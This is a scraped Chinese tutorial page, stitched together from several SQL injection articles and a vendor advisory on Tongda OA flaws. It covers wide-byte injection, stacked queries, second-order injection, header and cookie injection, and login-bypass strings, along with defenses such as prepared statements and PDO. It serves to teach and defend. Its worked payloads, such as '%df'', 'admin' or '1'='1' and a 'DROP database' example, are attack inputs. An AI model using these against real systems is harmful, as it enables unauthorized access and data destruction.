    我们输入  http://127.0.0.1/1/1/?id=1'

    这里addslashes函数把我们的 ’ 进行了转义,转义成了 \'。

    所以,我们要想绕过这个转义,就得把 \' 的 \ 给去掉。那么怎么去掉呢。

    1. 在转义之后,想办法让\前面再加一个\,或者偶数个\即可,这样就变成了\\' ,\ 被转义了,而 ‘ 逃出了限制。
    2. 在转义之后,想办法把 \ 弄没有,只留下一个 ' 。

    我们这里利用第2中方法,宽字节注入,这里利用的是MySQL的一个特性。MySQL在使用GBK编码的时候,会认为两个字符是一个汉字,前提是前一个字符的 ASCII 值大于128,才会认为是汉字。

    当我们输入如下语句的时候,看看会发生什么。

    127.0.0.1/1/1/?id=1%df'

    我们发现页面报错了,而且报错的那里是  '1運''  。我们只输入了 1%df ' ,最后变成了 1運 ' 。所以是mysql把我们输入的%df和反斜杠\ 合成了一起,当成了 運 来处理。而我们输入的单引号' 逃了出来,所以发生了报错。我们现在来仔细梳理一下思路。 我们输入了 1%df ’ ,而因为使用了addslashes()函数处理 ',所以最后变成了 1%df\' , 又因为会进行URL编码,所以最后变成了 1%df%5c%27 。而MySQL正是把%df%5c当成了汉字 運 来处理,所以最后 %27 也就是单引号逃脱了出来,这样就发生了报错。而这里我们不仅只是能输入%df ,我们只要输入的数据的ASCII码大于128就可以。因为在MySQL中只有当前一个字符的ASCII大于128,才会认为两个字符是一个汉字。所以只要我们输入的数据大于等于 %81 就可以使 ' 逃脱出来了。

    知道怎么绕过,我们就可以进行注入获得我们想要的信息了!

    既然GBK编码可以,那么GB2312可不可以呢?怀着这样的好奇,我们把数据库编码改成了GB2312,再次进行了测试。我们发现,当我们再次利用输入 1%df' 的时候,页面竟然不报错,那么这是为什么呢?

    这要归结于GB2312编码的取值范围。它编码的取值范围高位是0XA1~0XF7,低位是0XA1~0xFE,而 \ 是0x5C ,不在低位范围中。所以0x5c根本不是GB2312中的编码。所以,%5c 自然不会被当成中文的一部分给吃掉了。

    所以,通过这个我们可以得到结论,在所有的编码当中,只要低位范围中含有 0x5C的编码,就可以进行宽字符注入。

    发现了这个宽字符注入,于是很多程序猿把 addslashes() 函数换成了 mysql_real_escape_string() 函数,想用此来抵御宽字节的注入。因为php官方文档说了这个函数会考虑到连接的当前字符集。

    那么,使用了这个函数是否就可以抵御宽字符注入呢。我们测试一下,我们输入下面的语句

    http://127.0.0.1/1/3/?id=1%df'

    发现还是能进行宽字节的注入。那么这是为什么呢?原因就是,你没有指定php连接mysql的字符集。我们需要在执行SQL语句之前调用 mysql_set_charset 函数,并且设置当前连接的字符集为gbk。

    这样当我们再次输入的时候,就不能进行宽字节注入了!

    宽字节注入的修复

    在调用 mysql_real_escape_string() 函数之前,先设置连接所使用的字符集为GBK ,mysql_set_charset=('gbk',$conn) 。这个方法是可行的。但是还是有很多网站是使用的addslashes()函数进行过滤,我们不可能把所有的addslashes()函数都换成mysql_real_escape_string()。

    所以防止宽字节注入的另一个方法就是将 character_set_client 设置为binary(二进制)。需要在所有的sql语句前指定连接的形式是binary二进制:

    mysql_query("SET character_set_connection=gbk, character_set_results=gbk,character_set_client=binary", $conn); 

    当我们的MySQL收到客户端的请求数据后,会认为他的编码是character_set_client所对应的编码,也就是二进制。然后再将它转换成character_set_connection所对应的编码。然后进入具体表和字段后,再转换成字段对应的编码。当查询结果产生后,会从表和字段的编码转换成character_set_results所对应的编码,返回给客户端。所以,当我们将character_set_client编码设置成了binary,就不存在宽字节注入的问题了,所有的数据都是以二进制的形式传递。

    八:堆叠注入

    在SQL中,分号;是用来表示一条sql语句的结束。试想一下我们在 ; 结束后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别呢?区别就在于union 或者union all执行的语句类型是有限的,只可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:root';DROP database  user;服务器端生成的sql语句为:Select * from user where name='root';DROP database user;当执行查询后,第一条显示查询信息,第二条则将整个user数据库删除。

    参考:SQL注入-堆叠注入(堆查询注入)

              SQL Injection8(堆叠注入)——强网杯2019随便注

    九:二次注入

    二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。

    1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。
    2. 服务端应用程序会将黑客提交的数据信息进行存储,通常是保存在数据库中,保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。
    3. 黑客向服务端发送第二个与第一次不相同的请求数据信息。
    4. 服务端接收到黑客提交的第二个请求信息后,为了处理该请求,服务端会查询数据库中已经存储的数据信息并处理,从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。
    5. 服务端返回执行的处理结果数据信息,黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功

    我们访问 http://127.0.0.1/sqli/Less-24/index.php

    是一个登陆页面,我们没有账号,所以选择新建一个用户

    我们新建的用户名为:admin'#   密码为:123456

    查看数据库,可以看到,我们的数据插入进去了

    我们使用新建的用户名和密码登录

    登录成功了,跳转到了后台页面修改密码页面。

    我们修改用户名为:admin'#   密码为:aaaaaaaaa

    提示密码更新成功!

    我们查看数据库,发现用户 admin'# 的密码并没有修改,而且 admin 用户的密码修改为了  aaaaaaaaaa

    那么,为什么会这样呢?我们查看修改密码页面源代码,发现这里存在明显的SQL注入漏洞

    当我们提交用户名  admin'# 修改密码为 aaaaaaaaaa 的时候,这条SQL语句就变成了下面的语句了。

    #把后面的都给注释了,所以就是修改了admin用户的密码为 aaaaaaaaaa

    $sql = "UPDATE users SET PASSWORD='aaaaaaaaaa' where username='admin'#' and password='$curr_pass' ";

    十:User-Agent注入

    我们访问 http://127.0.0.1/sqli/Less-18/ ,页面显示一个登陆框和我们的ip信息

    当我们输入正确的用户名和密码之后登陆之后,页面多显示了 浏览器的User-Agent

    抓包,修改其User-Agent为

    'and extractvalue(1,concat(0x7e,database(),0x7e))and '1'='1  #我们可以将 database()修改为任何的函数

    可以看到,页面将当前的数据库显示出来了

    十一:Cookie注入

    如今绝大部门开发人员在开发过程中会对用户传入的参数进行适当的过滤,但是很多时候,由于个人对安全技术了解的不同,有些开发人员只会对get,post这种方式提交的数据进行参数过滤。

    但我们知道,很多时候,提交数据并非仅仅只有get / post这两种方式,还有一种经常被用到的方式:request("xxx"),即request方法。通过这种方法一样可以从用户提交的参数中获取参数值,这就造成了cookie注入的最基本条件:使用了request方法,但是只对用户get / post提交的数据进行过滤。

    我们这里有一个连接:www.xx.com/search.asp?id=1 

    我们访问:www.xx.com/srarch.asp 发现不能访问,说缺少id参数。

    我们将id=1放在cookie中再次访问,查看能否访问,如果能访问,则说明id参数可以通过cookie提交。

    那么,如果后端没有对cookie中传入的数据进行过滤,那么,这个网站就有可能存在cookie注入了!

    十二:过滤绕过

    传送门:SQL注入过滤的绕过

    十三:传说中的万能密码 

    sql="select*from test where username=' XX '  and password=' XX '  ";

    • admin' or '1'='1                  XX         //万能密码(已知用户名)
    • XX                                  'or'1'='1     //万能密码(不需要知道用户名)
    • 'or '1'='1'#                          XX         //万能密码(不知道用户名)

    SQL注入的预防

    既然SQL注入的危害那么大,那么我们要如何预防SQL注入呢?

    (1)预编译(PreparedStatement)(JSP)

    可以采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。

     String sql = "select id, no from user where id=?";
     PreparedStatement ps = conn.prepareStatement(sql);
     ps.setInt(1, id);
     ps.executeQuery();

    如上所示,就是典型的采用 SQL语句预编译来防止SQL注入 。为什么这样就可以防止SQL注入呢?

    其原因就是:采用了PreparedStatement预编译,就会将SQL语句:"select id, no from user where id=?" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。所以即使你后面输入了这些SQL命令,也不会被当成SQL命令来执行了,因为这些SQL命令的执行, 必须先通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为SQL命令来执行的,只会被当做字符串字面值参数。所以SQL语句预编译可以有效防御SQL注入。

    原理:SQL注入只对SQL语句的编译过程有破坏作用,而PreparedStatement已经预编译好了,执行阶段只是把输入串作为数据处理。而不再对SQL语句进行解析。因此也就避免了sql注入问题。

    (2)PDO(PHP)

    首先简单介绍一下什么是PDO。PDO是PHP Data Objects(php数据对象)的缩写。是在php5.1版本之后开始支持PDO。你可以把PDO看做是php提供的一个类。它提供了一组数据库抽象层API,使得编写php代码不再关心具体要连接的数据库类型。你既可以用使用PDO连接mysql,也可以用它连接oracle。并且PDO很好的解决了sql注入问题。

    PDO对于解决SQL注入的原理也是基于预编译。

    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
    $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
    $data->execute();

    实例化PDO对象之后,首先是对请求SQL语句做预编译处理。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。然后使用 bindParam()函数对用户输入的数据和参数id进行绑定,最后再执行,

    (3)使用正则表达式过滤

    虽然预编译可以有效预防SQL注,但是某些特定场景下,可能需要拼接用户输入的数据。这种情况下,我们就需要对用户输入的数据进行严格的检查,使用正则表达式对危险字符串进行过滤,这种方法是基于黑名单的过滤,以至于黑客想尽一切办法进行绕过注入。基于正则表达式的过滤方法还是不安全的,因为还存在绕过的风险。

    对用户输入的特殊字符进行严格过滤,如  ’、”、<、>、/、*、;、+、-、&、|、(、)、and、or、select、union

    (4) 其他

    • Web 应用中用于连接数据库的用户与数据库的系统管理员用户的权限有严格的区分(如不能执行 drop 等),并设置 Web 应用中用于连接数据库的用户不允许操作其他数据库
    • 设置 Web 应用中用于连接数据库的用户对 Web 目录不允许有写权限。
    • 严格限定参数类型和格式,明确参数检验的边界,必须在服务端正式处理之前对提交的数据的合法性进行检查
    • 使用 Web 应用防火墙

    相关文章: 科普基础 | 这可能是最全的SQL注入总结,不来看看吗

                       Sqlmap的使用

                       Sqli 注入点解析

                       DVWA之SQL注入考点小结

                       常见的SQL语句

                       Access数据库及注入方法

                       SQLServer数据库及注入方法

                       SQL注入知识库

    展开全文
  • 主要介绍了php中sql注入漏洞示例,大家在开发中一定要注意
  • 大家通常谈论的SQL注入都是一阶SQL注入漏洞,但是还有一种二阶SQL注入,原理跟一阶SQL注入相同,只是稍加复杂,而且更加难以发现,难以利用,今天我们来分析一下二阶SQL注入漏洞。二阶SQL注入原理首先,要明白一阶...

    大家通常谈论的SQL注入都是一阶SQL注入漏洞,但是还有一种二阶SQL注入,原理跟一阶SQL注入相同,只是稍加复杂,而且更加难以发现,难以利用,今天我们来分析一下二阶SQL注入漏洞。

    二阶SQL注入原理

    首先,要明白一阶SQL注入漏洞是在单个HTTP请求响应中触发的,而二阶SQL注入漏洞则需要两个HTTP请求响应,第一次HTTP请求是精心构造的,为第二次HTTP请求触发漏洞做准备。

    在第一个HTTP请求中,攻击者构造脏数据(带有单引号或注释符)存储到数据库中。

    在第二个HTTP请求中,攻击者直接从数据库中读取脏数据,没有执行进一步的校验和处理就拼接到下一次SQL查询中,从而造成二阶SQL注入漏洞。

    其实,归根结底还是一个信任问题。开发人员信任了从数据库中来的数据,而没有进行处理和净化。

    网上有张图对二次注入解释的比较清楚,在这里引用一下:

    3df57d700633af8a5e68846ed2bd68d3.png

    关于转义函数,我们需要重点关注:addslashes(),mysql_escape_string()mysql_real_escape_string()。这几个函数,在参数插入数据库时会对特殊字符进行转义,但是保存在数据库中时还是原始格式内容。

    二次SQL注入实例

    sqlilab是一个SQL注入练习靶场,全面涵盖了各种SQL注入场景,练习SQL注入技术,一定要刷sqlilab。(sqlilab项目下载地址:https://github.com/Audi-1/sqli-labs)

    sqlilab中的第二十四关,考察的知识点是二次SQL注入,我们来分析一下这个漏洞和其中的代码:

    f177ad00b046fa1bf3575b20a0354ceb.png

    登录的位置我们可以尝试是否存在SQL注入,尝试几次后发现行不通,无论输入什么SQL注入语句,都是无异常,如下图:

    60f11189a401d0993d60ff92fdf1902e.png

    看了源码才知道,这里输入的用户名和密码都经过了mysql_real_escape_string()这个函数的处理。

    640243c91da240083e452c34e0414cf7.png

    查一下这个函数,它会对SQL语句中的某些特殊字符进行转义:

    2756914378a2f20596d2a88f4c26e86d.png

    使用了这个函数,基本上注入是不太可能了。

    如果仔细看的话,在登录页面下面还有两个功能,一个是忘记密码,一个是注册新用户。我们先注册一个venus用户,密码为111111,然后使用这个用户登录,登录成功界面如下:

    88caf4f8c6a6ded49b5945c65d6542f4.png

    登录之后,是一个让我们修改密码的功能。

    我们看一下修改密码的源码并分析其中的逻辑

    406e20244c73ba373823100234ca5d6f.png

    可以看到$username是直接从session中获取的,并没有进行转义操作,而其他的几个变量如$curr_pass和$pass都已经经过mysql_real_escape_string函数处理。问题就出在$username这个参数上,session中的username是从数据库中获取到的。

    而在这个例子中,我们可以通过注册账号往数据库中写入带有特殊字符的username,我们先看看注册用户的后台处理代码:

    e59d32e462d40a922ff9493fa6ddd29e.png

    注册用户时,使用了mysql_escape_string()函数,前面提到过,这个函数会对特殊字符进行转义,但最终存储到数据库时还是保留了原始格式,我们可以注册一个venus’#用户来验证一下,密码是123123,注册完成登录:

    138bc595f6120e027daeb45f55c3b28a.png

    注册成功之后,我们去数据库中查看下当前的用户名和密码:

    b1f4273d056b9c551a2567dfbf670112.png

    前面的是系统内置的用户,15和16是我们刚才注册的用户。

    OK,现在我们来修改venus’#的密码,然后再看看修改密码的SQL语句,这里我们将密码改为123456。源码里的SQL语句如下:

    7532b0ef424aeae2e24068bae848f60b.png

    将用户名拼接到SQL语句中之后,SQL语句就成为了如下所示:

    UPDATE users SET PASSWORD='123456' where username='venus’#' and password='$curr_pass'

    由于#号注释掉了后面的语句,所以,我们本来是修改的venus’#的密码,但实际上修改了venus的密码,而且venus’#的当前密码也可以随便输入。

    e3f0e70fe8cfcc47e1bd3aa8c879d638.png

    8b76e4437e341cebccbba6d703400d21.png

    现在我们再来看看数据库中venus用户的密码:

    4ee0527a4258aec944888bd1444fd8b3.png

    发现venus的密码改变了,而venus’#的密码没有变化。

    我们现在用刚才修改的密码123456去登录venus这个用户

    d7943dd4d379e76e347088c1cbb5cf33.png

    登录成功。

    这就是典型的二次SQL注入漏洞。

    二阶SQL注入防御

    防御SQL注入最有效的方法还是预编译,尽量避免使用SQL语句拼接。

    如果使用了SQL语句拼接,要对所有拼接到SQL语句的参数进行严格的净化和处理。

    结语

    通过上面的讲解和案例分析,相信大家对二阶SQL注入有了一定的了解。二阶SQL注入漏洞比一阶SQL注入更加隐蔽和难以发现,根据二阶SQL注入形成原因,挖掘的时候应该重点关注数据库写入操作,比如创建用户或者是某个请求中提交精心构造的输入,然后逐步跟踪应用程序中可能会使用该输入的地方,来查找应用程序是否会有异常。二阶SQL注入的危害不仅是上文提到的修改管理员账户的密码,根据场景的不同,它的危害跟普通的SQL注入一样。如果在以后的渗透中遇到二阶SQL注入,会继续跟大家分享。

    参考文献

    1. 《SQL注入攻击与防御第二版》

    2.  https://www.jianshu.com/p/3fe7904683ac

    a4407c51cc4b8e061c5b80cd842e7a8d.png

    展开全文
  • sql注入漏洞

    2014-03-24 17:55:49
    :简要介绍了SQL注入攻击的原理,对SQL注入攻击方式进行了分析,总结了SQL注入攻 击的流程。根据SQL注入攻击的基本原理以及入侵前和入侵后的检测方法不同,提出了SQL注 入攻击检测的方法,并在此基础...
  • 近日,深信服安全团队监测到通达OA后台存在多个SQL注入漏洞的信息。漏洞利用需要具备普通用户权限,攻击者可通过拼接SQL语句,来执行恶意的SQL代码, 或获取数据库敏感数据。漏洞名称:通达OA 后台多个SQL注入漏洞...

    近日,深信服安全团队监测到通达OA后台存在多个SQL注入漏洞的信息。漏洞利用需要具备普通用户权限,攻击者可通过拼接SQL语句,来执行恶意的SQL代码, 或获取数据库敏感数据。

    漏洞名称:通达OA 后台多个SQL注入漏洞

    威胁等级:高危

    影响范围通达OA < V11.6、通达OA <= V11.7

    漏洞类型:SQL注入

    利用难度:中等

    漏洞分析

    1 通达OA介绍

    通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

    通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。

    2 漏洞描述

    近日,深信服安全团队监测到通达OA后台存在多个SQL注入漏洞的信息。漏洞利用需要具备普通用户权限,攻击者可通过拼接SQL语句,来执行恶意的SQL代码, 或获取数据库敏感数据。

    1. 后台SQL注入漏洞(一)

    2. 后台SQL注入漏洞(二)

    3. 后台SQL注入漏洞(三)

    3 漏洞复现

    搭建通达OA 漏洞环境,通过构造PoC,成功复现SQL注入3.1 后台SQL注入漏洞(一)

    4be8d96d924cf47267aae5331fd84237.png3.2 后台SQL注入漏洞(二)

    1fd7b827f741f0c00aa9d13b5cebf1bf.png

    3.3 后台SQL注入漏洞(三)

    70e31df7c4daab40a2747716cd3128fb.png

    影响范围

    目前受影响的通达OA版本:

    后台SQL注入(一):通达OA < 11.6版本

    后台SQL注入(二)、(三):通达OA <= V11.7 版本

    解决方案

    1 修复建议

    • 对于SQL注入漏洞(一),官方V11.6 或以上版本已修复该漏洞,请受影响的用户更新到最新版本;

    • 对于SQL注入漏洞(二)、(三),官方暂未发布修复补丁,请持续关注官方更新公告:https://www.tongda2000.com/download/sp2019.php

    2 深信服解决方案

    深信服下一代防火墙】可轻松防御此漏洞,建议部署深信服下一代防火墙的用户开启安全防护规则,可轻松抵御此高危风险。

    深信服云盾】已第一时间从云端自动更新防护规则,云盾用户无需操作,即可轻松、快速防御此高危风险。

    深信服安全感知平台】可检测利用该漏洞的攻击,实时告警,并可联动【深信服下一代防火墙等产品】实现对攻击者ip的封堵。

    深信服安全运营服务】深信服云端安全专家提供7*24小时持续的安全运营服务。在漏洞爆发之初,对存在漏洞的用户,检查并更新了客户防护设备的策略,确保客户防护设备可以防御此漏洞风险。

    时间轴

    2020/8/22

    深信服千里目实验室监测到通达OA安全漏洞问题

    2020/8/23

    深信服千里目实验室分析漏洞详情并复现此漏洞,发布解决方案。  

    展开全文
  • sql 注入漏洞

    2017-04-21 01:45:13
    sql注入相关知识
  • Sql 注入漏洞

    2010-08-01 01:53:00
    今天学习Servlet时,学习到的Sql注入漏洞的知识。 Code: select *from users where username='admin' and passwd='admin';  select *from users where username='dsa' and passwd='cdsa' ...
  • SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 11,815
精华内容 4,726
关键字:

sql注入漏洞